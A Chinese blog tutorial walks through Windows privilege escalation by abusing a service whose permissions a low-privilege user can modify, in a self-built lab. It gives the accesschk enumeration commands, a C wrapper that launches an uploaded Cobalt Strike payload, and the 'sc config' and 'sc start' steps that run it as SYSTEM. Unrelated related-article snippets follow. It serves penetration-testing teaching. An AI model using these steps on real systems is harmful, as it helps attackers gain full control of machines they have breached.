操作系统权限提升(六)之系统错误配置-不安全的服务提权

news/2025/4/1 6:35:20/

系列文章

操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

不安全的服务提权

不安全的服务提权原理

通常 Windows服务都是以 System权限运行的,当由于系统管理员错误配置导致低权限用户可以对某些服务修改时,可以通过修改服务启动文件的路径“ binpath”,将其替换为恶意程序的路径,这样服务启动时便会运行恶意程序

在这里插入图片描述
如何因为配置不当就可以替换执行文件的路径,导致提权

提权环境准备

1、先建一个服务,名字为qianfu,运行C盘下的1.exe

sc create qianfu binpath= "C:\1.exe"

在这里插入图片描述
2、使用subinacl给服务设置权限

subinacl /service qianfu /grant=apache=F

在这里插入图片描述

不安全的服务提权实战

1、首先先用MS或者CS控制目标靶机
在这里插入图片描述
2、这里借助 Access Chk工具快速发现配置不当的服务,下面先简单介绍这个工具。通过 AccessChk可以了解特定用户或组对资源的访问权限,包括文件、目录、注册表项、全局对象和 Windows服务

用法介绍命令
查看用户/用户组对文件文件夹的权限accesschk 用户/用户组文件件夹
列出所有服务的权限accesschk.exe -ucqv *
查看用户/用户组具有写权限的服务accesschk用户/用户组 -cw *
要查看用户/用户组对 HKEY LOCAL MACHINE、Software目录下注册表项的权限accesschk-k用户/用户组 hkl\software
查看每个人都可以修改的全局对象accesschk -wuo everyone \

我们把这个工具上传到目标机器上去

在这里插入图片描述

accesschk -cw * /accepteula

在这里插入图片描述
可以看到apache拥有RW权限

3、查看恶意上传的cs恶意程序文件路劲,并记录下来

在这里插入图片描述

4、制作恶意程序,将恶意的文件替换上去

在这里插入图片描述

#include <stdio.h>
#include <stdlib.h>
int main(){system("cmd.exe /c C:\\Users\\apache\\Desktop\\1.exe");return 0;
}

在这里插入图片描述

在这里插入图片描述

将我们的恶意文件上传到目标机器上去

在这里插入图片描述
5、更改qianfu服务的启动文件,替换成恶意的文件然后提权

sc config qianfu binpath= "C:\Users\apache\Desktop\521.exe"

在这里插入图片描述

我们可以通过命令查看当前服务执行的是哪些命令

sc qc qianfu

在这里插入图片描述

6、手动启动服务,提权成功

sc start qianfu

在这里插入图片描述


http://www.ppmy.cn/news/21256.html

相关文章

【C++入门】缺省参数

目  录1 缺省参数1.1 缺省参数概念1.2 缺省参数分类1.3 缺省参数使用注意1 缺省参数 1.1 缺省参数概念 缺省参数是声明或定义函数时为函数的参数指定一个缺省值。 在调用该函数时&#xff0c;如果没有指定实参&#xff0c;则采用该形参的缺省值&#xff0c;否则使用指定的实…

(05)VUE/JS 保留小数方法合集 (保留两位为例)

分别从四舍五入和是否自动补0这两个方面进行入手。 会四舍五入 1、toFixed()函数 注意&#xff1a;此方法将数值类型的数据改变成了字符串类型 // 四舍五入 var num 1.6492; num num.toFixed(2); console.log(num); //1.65 console.log(typeof num); //str…

【Linux】操作系统(Operator System)

目录 一、操作系统是什么 1、操作系统概念 2、操作系统的定位 3、设计OS的目的 4、操作系统的重要性 二、 理解操作系统 三、系统调用 系统调用和库函数的关系 一、操作系统是什么 1、操作系统概念 任何计算机系统都包含一个基本的程序集合&#xff0c;称为操作系统…

【机器学习算法】模型评估 “神经网络,聚类,向量机,关联规则”算法模型的评估。

模型评估* 数据集的切割 训练-测试数据的方式、交叉验证的方式 我们通常会把数据集切割为训练数据集或者测试数据集&#xff0c;训练数据集用来训练模型用&#xff0c;测试数据集我们一般用来测试模式的实际效能怎么样。 我们在将数据分为训练和测试数据集的时候我们会使用…

Linux系统之升级内核版本方法

Linux系统之升级内核版本方法一、检查本地系统环境1.检查系统版本2.检查系统内核版本二、小版本升级内核1.列出yum仓库的内核包版本2.升级内核3.重启并检查内核版本三、大版本升级内核1.导入公钥2.下载并安装elrepo仓库3.载入elrepo-kernel元数据4.列出rpm包5.安装最新版本kern…

多线程为什么要加锁

一、线程之间私有和共享的资源 1、私有: 线程栈、寄存器、程序寄存器 2、共享: 堆、地址空间、全局变量、静态变量 二、线程读、写内存数据过程 1、读 1&#xff09;将内存内容复制到CPU寄存器。load 2、写 1&#xff09;将内存内容复制到CPU寄存器。load 2&#xff09;在…

dataworks插入,分组,排序,关联语句

– 向表中插入数据 – insert into/overwrite table 表名 values (…),(…),…; – insert into/overwrite table 表名 select …; – 创建样例表 create table if not exists temp_test_xsxx_30( xh string comment ‘学号’, xm string comment ‘姓名’, xb string comment…

[算法设计与分析考点3] 递归经典案例之汉诺塔问题

文章目录 印度的古老传说 问题描述 解题思路 递归实现 印度的古老传说 在世界中心贝拿勒斯&#xff08;在印度北部&#xff09;的圣庙里&#xff0c;一块黄铜板上插着三根宝石针。 印度教的主神梵天在创造世界的时候&#xff0c;在其中一根针上从下到上地穿好了由大到小的64片…